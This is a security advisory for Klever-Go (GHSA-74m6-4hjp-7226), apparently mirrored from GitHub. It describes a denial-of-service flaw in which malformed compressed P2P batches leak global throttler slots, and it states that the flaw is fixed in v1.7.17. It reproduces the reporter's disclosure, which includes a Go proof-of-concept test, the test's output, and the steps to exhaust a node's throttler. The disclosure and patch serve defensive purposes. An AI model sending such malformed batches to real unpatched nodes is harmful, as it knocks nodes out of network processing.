GHSA-74M6-4HJP-7226
Vulnerability from github – Published: 2026-06-04 17:40 – Updated: 2026-06-04 17:40
VLAI
Summary
Klever-Go P2P MultiDataInterceptor leaks global throttler slots on malformed compressed batches (DoS)
Details
Publisher note
Fixed in v1.7.17. Operators running < v1.7.17 should upgrade. The decompression-error path in MultiDataInterceptor.ProcessReceivedMessage now releases the global throttler slot before returning (guarded defer after StartProcessing(), disabled when the asynchronous goroutine takes ownership).
Patch commits on develop: 333f6ec9, 68b94a40 (merged from private fork klever-io/klever-go-ghsa-74m6-4hjp-7226).
This advisory was originally filed jointly with a separate KVM read-only isolation bypass; that finding is now tracked under GHSA-jc6w-wmfc-fh33 so each issue receives its own CVE.
The original disclosure from @LoGGGG240211 follows verbatim, including the embedded proof-of-concept source.
Private Vulnerability Report
Repository: klever-io/klever-go Reviewed commit: 405d01b0abbf0d3e73b4a990bd7394a01f200dc2 Disclosure channel: GitHub Private Vulnerability Reporting Reporter GitHub account: LoGGGG240211
2.1 MultiDataInterceptor malformed compressed batches permanently consume global P2P throttler slots
Severity : High Confidence : HIGH Attack Complexity : LOW PoC Status : Confirmed
Description
The P2P MultiDataInterceptor starts throttled processing before it validates and decompresses a received batch. PreProcessMessage checks whether the global interceptor throttler can process the message and then calls StartProcessing(). After that point, ProcessReceivedMessage unmarshals the batch and enters the compressed-batch branch when b.IsCompressed is true. If b.Decompress() fails, the function logs the gzip error and returns immediately without calling EndProcessing().
This creates a permanent slot leak in the interceptor throttler. The normal successful path releases the slot only later in the asynchronous processing goroutine. Other validation error paths release the slot explicitly, but the decompression-error path does not. The impact is amplified because the same global throttler is shared by transaction multi-data interceptors, trie-node multi-data interceptors, and header interceptors. The hardcoded global capacity is 100, so a connected peer that can deliver 100 malformed compressed batch envelopes can cause later valid P2P interceptor processing on the affected node to fail with system busy until the process is restarted or the throttler state is otherwise reset.
Location
- baseDataInterceptor.go, PreProcessMessage(), line 42
- baseDataInterceptor.go, PreProcessMessage(), line 47
- multiDataInterceptor.go, ProcessReceivedMessage(), line 95
- multiDataInterceptor.go, ProcessReceivedMessage(), line 99
- baseInterceptorsContainerFactory.go, numGoRoutines, line 21
- baseInterceptorsContainerFactory.go, createOneTxInterceptor(), line 160
- baseInterceptorsContainerFactory.go, createOneTrieNodesInterceptor(), line 190
- baseInterceptorsContainerFactory.go, generateMetachainHeaderInterceptors(), line 232
Preconditions
- The attacker can connect as a P2P peer or otherwise send P2P messages that reach a
MultiDataInterceptortopic handler. - The malformed message must pass the outer preprocessing checks before the decompression branch.
- No validator role, private key, capital, oracle condition, or timing condition is required.
Impact
Successful exploitation causes a persistent per-node denial of P2P interceptor processing until node restart or throttler reset. The affected throttler is shared across transaction batch processing and trie-node sync processing, and header processing also uses the same throttler. The PoC demonstrates the concrete effect with a capacity-2 throttler: two malformed compressed batches leak both slots and the third message returns system busy. In the reviewed codebase, the production factory hardcodes the shared capacity to 100, so the same condition is expected after approximately 100 malformed compressed batches. The impact is reversible by restarting the node or otherwise resetting the throttler state.
Exploit Cost
No gas and no protocol capital are required. The practical cost is the network cost of sending malformed compressed P2P batch messages to the target node, approximately 100 messages for the hardcoded production global capacity.
Steps to Reproduce
- Place
poc_mdi_throttler_slot_leak_test.goin an empty directory. - Run the dependency commands listed in the PoC header.
- Run
GOTOOLCHAIN=go1.25.9 go test -v poc_mdi_throttler_slot_leak_test.go. - Observe that the first proof increments
StartProcessing()without incrementingEndProcessing()after a gzip decompression error. - Observe that the second proof uses a real capacity-2 throttler and reaches
system busyon the third malformed compressed batch.
Proof-of-Concept Result
Running GOTOOLCHAIN=go1.25.9 go test -v poc_mdi_throttler_slot_leak_test.go after dependency setup produces the following output. The result confirms that malformed compressed batches leak throttler slots and cause a real throttler to reject later processing as system busy.
=== RUN TestPoC_MalformedCompressedBatchLeaksThrottlerSlot
ERROR[2026-04-28 13:35:04.398] MultiDataInterceptor.ProcessReceivedMessage err = gzip: invalid header
poc_mdi_throttler_slot_leak_test.go:108: process_error=gzip: invalid header
poc_mdi_throttler_slot_leak_test.go:109: start_count_before=0
poc_mdi_throttler_slot_leak_test.go:110: start_count_after=1
poc_mdi_throttler_slot_leak_test.go:111: end_count_before=0
poc_mdi_throttler_slot_leak_test.go:112: end_count_after=0
ERROR[2026-04-28 13:35:04.398] MultiDataInterceptor.ProcessReceivedMessage err = gzip: invalid header
ERROR[2026-04-28 13:35:04.398] MultiDataInterceptor.ProcessReceivedMessage err = gzip: invalid header
poc_mdi_throttler_slot_leak_test.go:133: real_throttler_attempt_1=gzip: invalid header
poc_mdi_throttler_slot_leak_test.go:134: real_throttler_attempt_2=gzip: invalid header
poc_mdi_throttler_slot_leak_test.go:135: real_throttler_attempt_3=system busy
--- PASS: TestPoC_MalformedCompressedBatchLeaksThrottlerSlot (0.00s)
PASS
ok command-line-arguments 0.002s
Suggested Fix
Ensure that every path after StartProcessing() releases the throttler slot exactly once. A direct fix is to call EndProcessing() before returning from the decompression-error branch. A more robust fix is to use a guarded defer immediately after StartProcessing() and disable that defer only when the asynchronous goroutine takes ownership of releasing the slot.
Closing
I am available to answer technical questions regarding these findings and to review proposed fixes prior to deployment. Please contact me through this disclosure thread or through the email address associated with this submission.
Proof-of-Concept Source
poc_mdi_throttler_slot_leak_test.go
package poc
/*
Target contract : Klever-Go P2P MultiDataInterceptor; no on-chain address
Vulnerability : Denial of service through leaked global P2P throttler slots
Severity : High
How to run : GOTOOLCHAIN=go1.25.9 go test -v poc_mdi_throttler_slot_leak_test.go
Expected output : The test passes and logs that a real throttler returns system busy after malformed compressed batches
Dependencies : In an empty directory containing this file, run: go mod init klever-go-disclosure-poc; go get github.com/klever-io/klever-go@v1.7.17-0.20260422114731-405d01b0abbf; go mod tidy
*/
import (
"errors"
"fmt"
"testing"
"github.com/klever-io/klever-go/common"
"github.com/klever-io/klever-go/common/mock"
"github.com/klever-io/klever-go/core"
"github.com/klever-io/klever-go/core/process/interceptors"
"github.com/klever-io/klever-go/core/throttler"
"github.com/klever-io/klever-go/data/batch"
)
func malformedCompressedBatchPayload(t *testing.T, marshalizer *mock.MarshalizerMock) []byte {
t.Helper()
// Build a syntactically valid batch envelope whose compressed stream is not valid gzip.
payload, err := marshalizer.Marshal(&batch.Batch{
IsCompressed: true,
Stream: []byte("not-a-gzip-stream"),
DataSize: 1,
})
if err != nil {
t.Fatalf("marshal malformed compressed batch: %v", err)
}
return payload
}
func newMultiDataInterceptor(t *testing.T, marshalizer *mock.MarshalizerMock, throttlerArg interface {
CanProcess() bool
StartProcessing()
EndProcessing()
IsInterfaceNil() bool
}) *interceptors.MultiDataInterceptor {
t.Helper()
// Use the production transaction topic and production MultiDataInterceptor constructor.
arg := interceptors.ArgMultiDataInterceptor{
Topic: common.TransactionTopic,
Marshalizer: marshalizer,
DataFactory: &mock.InterceptedDataFactoryStub{},
Processor: &mock.InterceptorProcessorStub{},
Throttler: throttlerArg,
AntifloodHandler: &mock.P2PAntifloodHandlerStub{},
WhiteListRequest: &mock.WhiteListHandlerStub{},
CurrentPeerID: core.PeerID("local-peer"),
}
mdi, err := interceptors.NewMultiDataInterceptor(arg)
if err != nil {
t.Fatalf("construct MultiDataInterceptor: %v", err)
}
return mdi
}
func malformedP2PBatchMessage(payload []byte, sequence int) *mock.P2PMessageMock {
// Build a P2P message that passes outer message preprocessing and reaches decompression.
return &mock.P2PMessageMock{
DataField: payload,
PeerField: core.PeerID("origin-peer"),
SeqNoField: []byte(fmt.Sprintf("seq-%d", sequence)),
}
}
func TestPoC_MalformedCompressedBatchLeaksThrottlerSlot(t *testing.T) {
marshalizer := &mock.MarshalizerMock{}
// First prove that a malformed compressed batch calls StartProcessing without a matching EndProcessing.
countingThrottler := &mock.InterceptorThrottlerStub{
CanProcessCalled: func() bool { return true },
}
mdiWithCountingThrottler := newMultiDataInterceptor(t, marshalizer, countingThrottler)
payload := malformedCompressedBatchPayload(t, marshalizer)
message := malformedP2PBatchMessage(payload, 1)
startBefore := countingThrottler.StartProcessingCount()
endBefore := countingThrottler.EndProcessingCount()
err := mdiWithCountingThrottler.ProcessReceivedMessage(message, core.PeerID("connected-peer"))
startAfter := countingThrottler.StartProcessingCount()
endAfter := countingThrottler.EndProcessingCount()
// The vulnerable branch returns the gzip error after StartProcessing but before EndProcessing.
if err == nil {
t.Fatalf("expected gzip error, got nil")
}
if startAfter != startBefore+1 {
t.Fatalf("expected one throttler start, before=%d after=%d", startBefore, startAfter)
}
if endAfter != endBefore {
t.Fatalf("expected no throttler end on decompress error, before=%d after=%d", endBefore, endAfter)
}
t.Logf("process_error=%v", err)
t.Logf("start_count_before=%d", startBefore)
t.Logf("start_count_after=%d", startAfter)
t.Logf("end_count_before=%d", endBefore)
t.Logf("end_count_after=%d", endAfter)
// Then prove direct impact with a real capacity-2 throttler.
realThrottler, err := throttler.NewNumGoRoutinesThrottler(2)
if err != nil {
t.Fatalf("construct real throttler: %v", err)
}
mdiWithRealThrottler := newMultiDataInterceptor(t, marshalizer, realThrottler)
err1 := mdiWithRealThrottler.ProcessReceivedMessage(malformedP2PBatchMessage(payload, 2), core.PeerID("connected-peer"))
err2 := mdiWithRealThrottler.ProcessReceivedMessage(malformedP2PBatchMessage(payload, 3), core.PeerID("connected-peer"))
err3 := mdiWithRealThrottler.ProcessReceivedMessage(malformedP2PBatchMessage(payload, 4), core.PeerID("connected-peer"))
// The third attempt is rejected as system busy because leaked slots were not released.
if err1 == nil || err2 == nil {
t.Fatalf("expected first two malformed attempts to return gzip errors, got err1=%v err2=%v", err1, err2)
}
if !errors.Is(err3, common.ErrSystemBusy) {
t.Fatalf("expected third attempt to hit system busy, got %v", err3)
}
t.Logf("real_throttler_attempt_1=%v", err1)
t.Logf("real_throttler_attempt_2=%v", err2)
t.Logf("real_throttler_attempt_3=%v", err3)
}
Severity
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/klever-io/klever-go"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.7.17"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-04T17:40:51Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Publisher note\n\n**Fixed in `v1.7.17`.** Operators running `\u003c v1.7.17` should upgrade. The decompression-error path in `MultiDataInterceptor.ProcessReceivedMessage` now releases the global throttler slot before returning (guarded `defer` after `StartProcessing()`, disabled when the asynchronous goroutine takes ownership).\n\nPatch commits on `develop`: 333f6ec9, 68b94a40 (merged from private fork `klever-io/klever-go-ghsa-74m6-4hjp-7226`).\n\nThis advisory was originally filed jointly with a separate KVM read-only isolation bypass; that finding is now tracked under [GHSA-jc6w-wmfc-fh33](https://github.com/klever-io/klever-go/security/advisories/GHSA-jc6w-wmfc-fh33) so each issue receives its own CVE.\n\nThe original disclosure from @LoGGGG240211 follows verbatim, including the embedded proof-of-concept source.\n\n---\n\n# Private Vulnerability Report\n\nRepository: klever-io/klever-go\nReviewed commit: 405d01b0abbf0d3e73b4a990bd7394a01f200dc2\nDisclosure channel: GitHub Private Vulnerability Reporting\nReporter GitHub account: LoGGGG240211\n\n## 2.1 MultiDataInterceptor malformed compressed batches permanently consume global P2P throttler slots\n\nSeverity : High\nConfidence : HIGH\nAttack Complexity : LOW\nPoC Status : Confirmed\n\n### Description\n\nThe P2P `MultiDataInterceptor` starts throttled processing before it validates and decompresses a received batch. `PreProcessMessage` checks whether the global interceptor throttler can process the message and then calls `StartProcessing()`. After that point, `ProcessReceivedMessage` unmarshals the batch and enters the compressed-batch branch when `b.IsCompressed` is true. If `b.Decompress()` fails, the function logs the gzip error and returns immediately without calling `EndProcessing()`.\n\nThis creates a permanent slot leak in the interceptor throttler. The normal successful path releases the slot only later in the asynchronous processing goroutine. Other validation error paths release the slot explicitly, but the decompression-error path does not. The impact is amplified because the same global throttler is shared by transaction multi-data interceptors, trie-node multi-data interceptors, and header interceptors. The hardcoded global capacity is 100, so a connected peer that can deliver 100 malformed compressed batch envelopes can cause later valid P2P interceptor processing on the affected node to fail with `system busy` until the process is restarted or the throttler state is otherwise reset.\n\n### Location\n\n1. [baseDataInterceptor.go, PreProcessMessage(), line 42](https://github.com/klever-io/klever-go/blob/405d01b0abbf0d3e73b4a990bd7394a01f200dc2/core/process/interceptors/baseDataInterceptor.go#L42)\n2. [baseDataInterceptor.go, PreProcessMessage(), line 47](https://github.com/klever-io/klever-go/blob/405d01b0abbf0d3e73b4a990bd7394a01f200dc2/core/process/interceptors/baseDataInterceptor.go#L47)\n3. [multiDataInterceptor.go, ProcessReceivedMessage(), line 95](https://github.com/klever-io/klever-go/blob/405d01b0abbf0d3e73b4a990bd7394a01f200dc2/core/process/interceptors/multiDataInterceptor.go#L95)\n4. [multiDataInterceptor.go, ProcessReceivedMessage(), line 99](https://github.com/klever-io/klever-go/blob/405d01b0abbf0d3e73b4a990bd7394a01f200dc2/core/process/interceptors/multiDataInterceptor.go#L99)\n5. [baseInterceptorsContainerFactory.go, numGoRoutines, line 21](https://github.com/klever-io/klever-go/blob/405d01b0abbf0d3e73b4a990bd7394a01f200dc2/core/process/factory/interceptorscontainer/baseInterceptorsContainerFactory.go#L21)\n6. [baseInterceptorsContainerFactory.go, createOneTxInterceptor(), line 160](https://github.com/klever-io/klever-go/blob/405d01b0abbf0d3e73b4a990bd7394a01f200dc2/core/process/factory/interceptorscontainer/baseInterceptorsContainerFactory.go#L160)\n7. [baseInterceptorsContainerFactory.go, createOneTrieNodesInterceptor(), line 190](https://github.com/klever-io/klever-go/blob/405d01b0abbf0d3e73b4a990bd7394a01f200dc2/core/process/factory/interceptorscontainer/baseInterceptorsContainerFactory.go#L190)\n8. [baseInterceptorsContainerFactory.go, generateMetachainHeaderInterceptors(), line 232](https://github.com/klever-io/klever-go/blob/405d01b0abbf0d3e73b4a990bd7394a01f200dc2/core/process/factory/interceptorscontainer/baseInterceptorsContainerFactory.go#L232)\n\n### Preconditions\n\n1. The attacker can connect as a P2P peer or otherwise send P2P messages that reach a `MultiDataInterceptor` topic handler.\n2. The malformed message must pass the outer preprocessing checks before the decompression branch.\n3. No validator role, private key, capital, oracle condition, or timing condition is required.\n\n### Impact\n\nSuccessful exploitation causes a persistent per-node denial of P2P interceptor processing until node restart or throttler reset. The affected throttler is shared across transaction batch processing and trie-node sync processing, and header processing also uses the same throttler. The PoC demonstrates the concrete effect with a capacity-2 throttler: two malformed compressed batches leak both slots and the third message returns `system busy`. In the reviewed codebase, the production factory hardcodes the shared capacity to 100, so the same condition is expected after approximately 100 malformed compressed batches. The impact is reversible by restarting the node or otherwise resetting the throttler state.\n\n### Exploit Cost\n\nNo gas and no protocol capital are required. The practical cost is the network cost of sending malformed compressed P2P batch messages to the target node, approximately 100 messages for the hardcoded production global capacity.\n\n### Steps to Reproduce\n\n1. Place `poc_mdi_throttler_slot_leak_test.go` in an empty directory.\n2. Run the dependency commands listed in the PoC header.\n3. Run `GOTOOLCHAIN=go1.25.9 go test -v poc_mdi_throttler_slot_leak_test.go`.\n4. Observe that the first proof increments `StartProcessing()` without incrementing `EndProcessing()` after a gzip decompression error.\n5. Observe that the second proof uses a real capacity-2 throttler and reaches `system busy` on the third malformed compressed batch.\n\n### Proof-of-Concept Result\n\nRunning `GOTOOLCHAIN=go1.25.9 go test -v poc_mdi_throttler_slot_leak_test.go` after dependency setup produces the following output. The result confirms that malformed compressed batches leak throttler slots and cause a real throttler to reject later processing as `system busy`.\n\n```text\n=== RUN TestPoC_MalformedCompressedBatchLeaksThrottlerSlot\nERROR[2026-04-28 13:35:04.398] MultiDataInterceptor.ProcessReceivedMessage err = gzip: invalid header\n poc_mdi_throttler_slot_leak_test.go:108: process_error=gzip: invalid header\n poc_mdi_throttler_slot_leak_test.go:109: start_count_before=0\n poc_mdi_throttler_slot_leak_test.go:110: start_count_after=1\n poc_mdi_throttler_slot_leak_test.go:111: end_count_before=0\n poc_mdi_throttler_slot_leak_test.go:112: end_count_after=0\nERROR[2026-04-28 13:35:04.398] MultiDataInterceptor.ProcessReceivedMessage err = gzip: invalid header\nERROR[2026-04-28 13:35:04.398] MultiDataInterceptor.ProcessReceivedMessage err = gzip: invalid header\n poc_mdi_throttler_slot_leak_test.go:133: real_throttler_attempt_1=gzip: invalid header\n poc_mdi_throttler_slot_leak_test.go:134: real_throttler_attempt_2=gzip: invalid header\n poc_mdi_throttler_slot_leak_test.go:135: real_throttler_attempt_3=system busy\n--- PASS: TestPoC_MalformedCompressedBatchLeaksThrottlerSlot (0.00s)\nPASS\nok \tcommand-line-arguments\t0.002s\n```\n\n### Suggested Fix\n\nEnsure that every path after `StartProcessing()` releases the throttler slot exactly once. A direct fix is to call `EndProcessing()` before returning from the decompression-error branch. A more robust fix is to use a guarded `defer` immediately after `StartProcessing()` and disable that defer only when the asynchronous goroutine takes ownership of releasing the slot.\n\n## Closing\n\nI am available to answer technical questions regarding these findings and to review proposed fixes prior to deployment. Please contact me through this disclosure thread or through the email address associated with this submission.\n\n## Proof-of-Concept Source\n\n### poc_mdi_throttler_slot_leak_test.go\n\n```go\npackage poc\n\n/*\nTarget contract : Klever-Go P2P MultiDataInterceptor; no on-chain address\nVulnerability : Denial of service through leaked global P2P throttler slots\nSeverity : High\nHow to run : GOTOOLCHAIN=go1.25.9 go test -v poc_mdi_throttler_slot_leak_test.go\nExpected output : The test passes and logs that a real throttler returns system busy after malformed compressed batches\nDependencies : In an empty directory containing this file, run: go mod init klever-go-disclosure-poc; go get github.com/klever-io/klever-go@v1.7.17-0.20260422114731-405d01b0abbf; go mod tidy\n*/\n\nimport (\n\t\"errors\"\n\t\"fmt\"\n\t\"testing\"\n\n\t\"github.com/klever-io/klever-go/common\"\n\t\"github.com/klever-io/klever-go/common/mock\"\n\t\"github.com/klever-io/klever-go/core\"\n\t\"github.com/klever-io/klever-go/core/process/interceptors\"\n\t\"github.com/klever-io/klever-go/core/throttler\"\n\t\"github.com/klever-io/klever-go/data/batch\"\n)\n\nfunc malformedCompressedBatchPayload(t *testing.T, marshalizer *mock.MarshalizerMock) []byte {\n\tt.Helper()\n\n\t// Build a syntactically valid batch envelope whose compressed stream is not valid gzip.\n\tpayload, err := marshalizer.Marshal(\u0026batch.Batch{\n\t\tIsCompressed: true,\n\t\tStream: []byte(\"not-a-gzip-stream\"),\n\t\tDataSize: 1,\n\t})\n\tif err != nil {\n\t\tt.Fatalf(\"marshal malformed compressed batch: %v\", err)\n\t}\n\n\treturn payload\n}\n\nfunc newMultiDataInterceptor(t *testing.T, marshalizer *mock.MarshalizerMock, throttlerArg interface {\n\tCanProcess() bool\n\tStartProcessing()\n\tEndProcessing()\n\tIsInterfaceNil() bool\n}) *interceptors.MultiDataInterceptor {\n\tt.Helper()\n\n\t// Use the production transaction topic and production MultiDataInterceptor constructor.\n\targ := interceptors.ArgMultiDataInterceptor{\n\t\tTopic: common.TransactionTopic,\n\t\tMarshalizer: marshalizer,\n\t\tDataFactory: \u0026mock.InterceptedDataFactoryStub{},\n\t\tProcessor: \u0026mock.InterceptorProcessorStub{},\n\t\tThrottler: throttlerArg,\n\t\tAntifloodHandler: \u0026mock.P2PAntifloodHandlerStub{},\n\t\tWhiteListRequest: \u0026mock.WhiteListHandlerStub{},\n\t\tCurrentPeerID: core.PeerID(\"local-peer\"),\n\t}\n\n\tmdi, err := interceptors.NewMultiDataInterceptor(arg)\n\tif err != nil {\n\t\tt.Fatalf(\"construct MultiDataInterceptor: %v\", err)\n\t}\n\n\treturn mdi\n}\n\nfunc malformedP2PBatchMessage(payload []byte, sequence int) *mock.P2PMessageMock {\n\t// Build a P2P message that passes outer message preprocessing and reaches decompression.\n\treturn \u0026mock.P2PMessageMock{\n\t\tDataField: payload,\n\t\tPeerField: core.PeerID(\"origin-peer\"),\n\t\tSeqNoField: []byte(fmt.Sprintf(\"seq-%d\", sequence)),\n\t}\n}\n\nfunc TestPoC_MalformedCompressedBatchLeaksThrottlerSlot(t *testing.T) {\n\tmarshalizer := \u0026mock.MarshalizerMock{}\n\n\t// First prove that a malformed compressed batch calls StartProcessing without a matching EndProcessing.\n\tcountingThrottler := \u0026mock.InterceptorThrottlerStub{\n\t\tCanProcessCalled: func() bool { return true },\n\t}\n\tmdiWithCountingThrottler := newMultiDataInterceptor(t, marshalizer, countingThrottler)\n\tpayload := malformedCompressedBatchPayload(t, marshalizer)\n\tmessage := malformedP2PBatchMessage(payload, 1)\n\n\tstartBefore := countingThrottler.StartProcessingCount()\n\tendBefore := countingThrottler.EndProcessingCount()\n\n\terr := mdiWithCountingThrottler.ProcessReceivedMessage(message, core.PeerID(\"connected-peer\"))\n\n\tstartAfter := countingThrottler.StartProcessingCount()\n\tendAfter := countingThrottler.EndProcessingCount()\n\n\t// The vulnerable branch returns the gzip error after StartProcessing but before EndProcessing.\n\tif err == nil {\n\t\tt.Fatalf(\"expected gzip error, got nil\")\n\t}\n\tif startAfter != startBefore+1 {\n\t\tt.Fatalf(\"expected one throttler start, before=%d after=%d\", startBefore, startAfter)\n\t}\n\tif endAfter != endBefore {\n\t\tt.Fatalf(\"expected no throttler end on decompress error, before=%d after=%d\", endBefore, endAfter)\n\t}\n\n\tt.Logf(\"process_error=%v\", err)\n\tt.Logf(\"start_count_before=%d\", startBefore)\n\tt.Logf(\"start_count_after=%d\", startAfter)\n\tt.Logf(\"end_count_before=%d\", endBefore)\n\tt.Logf(\"end_count_after=%d\", endAfter)\n\n\t// Then prove direct impact with a real capacity-2 throttler.\n\trealThrottler, err := throttler.NewNumGoRoutinesThrottler(2)\n\tif err != nil {\n\t\tt.Fatalf(\"construct real throttler: %v\", err)\n\t}\n\tmdiWithRealThrottler := newMultiDataInterceptor(t, marshalizer, realThrottler)\n\n\terr1 := mdiWithRealThrottler.ProcessReceivedMessage(malformedP2PBatchMessage(payload, 2), core.PeerID(\"connected-peer\"))\n\terr2 := mdiWithRealThrottler.ProcessReceivedMessage(malformedP2PBatchMessage(payload, 3), core.PeerID(\"connected-peer\"))\n\terr3 := mdiWithRealThrottler.ProcessReceivedMessage(malformedP2PBatchMessage(payload, 4), core.PeerID(\"connected-peer\"))\n\n\t// The third attempt is rejected as system busy because leaked slots were not released.\n\tif err1 == nil || err2 == nil {\n\t\tt.Fatalf(\"expected first two malformed attempts to return gzip errors, got err1=%v err2=%v\", err1, err2)\n\t}\n\tif !errors.Is(err3, common.ErrSystemBusy) {\n\t\tt.Fatalf(\"expected third attempt to hit system busy, got %v\", err3)\n\t}\n\n\tt.Logf(\"real_throttler_attempt_1=%v\", err1)\n\tt.Logf(\"real_throttler_attempt_2=%v\", err2)\n\tt.Logf(\"real_throttler_attempt_3=%v\", err3)\n}\n```",
"id": "GHSA-74m6-4hjp-7226",
"modified": "2026-06-04T17:40:51Z",
"published": "2026-06-04T17:40:51Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/klever-io/klever-go/security/advisories/GHSA-74m6-4hjp-7226"
},
{
"type": "WEB",
"url": "https://github.com/klever-io/klever-go/commit/333f6ec910906e227705fc5767dc897d8fbfc862"
},
{
"type": "WEB",
"url": "https://github.com/klever-io/klever-go/commit/68b94a40824fac2d848a4ded6eb7c91ada6ce9ef"
},
{
"type": "PACKAGE",
"url": "https://github.com/klever-io/klever-go"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Klever-Go P2P MultiDataInterceptor leaks global throttler slots on malformed compressed batches (DoS)"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…